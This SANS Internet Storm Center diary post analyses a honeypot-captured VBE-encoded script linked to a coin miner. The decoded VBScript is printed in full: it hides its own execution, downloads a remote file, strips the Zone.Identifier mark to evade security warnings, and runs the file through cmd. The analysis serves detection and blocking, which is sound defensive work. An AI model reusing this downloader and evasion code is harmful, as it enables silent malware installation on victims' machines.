Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: VBE Embeded Script ( - Internet Security | DShield SANS ISC InfoSec Forums

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
VBE Embeded Script (

My honeypot captured several copies of this file (info.vbe). I used Didier's Python script to examine the file and obtained following output:

vagrant@brain:~$ ./ info.vbe
Set WshShell = CreateObject("WScript.Shell")
If Instr(1,WScript.FullName,"WScript.exe",1)>0 Then
  WshShell.Run "CScript """&WScript.ScriptFullName&"""",0: WScript.Quit
End if
strFileURL = ""
strHDLocation = Tmp
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") "GET", strFileURL, false
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
Echo=DosCommand("cmd /c (echo [ZoneTransfer] & echo ZoneId=0) > "&Tmp&":Zone.Identifier",2000)
Echo=DosCommand("cmd /c "&Tmp&" ",2000)

Function DosCommand(command,sleep)
  Set WshExec=WshShell.Exec(command): WScript.Sleep sleep: WshExec.Terminate()

This VBE encoded script is currently detected by 41 AV engines and associated with a Coin Miner. The file in this URL is no longer active but the domain still resolves and should be blocked.


Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


414 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!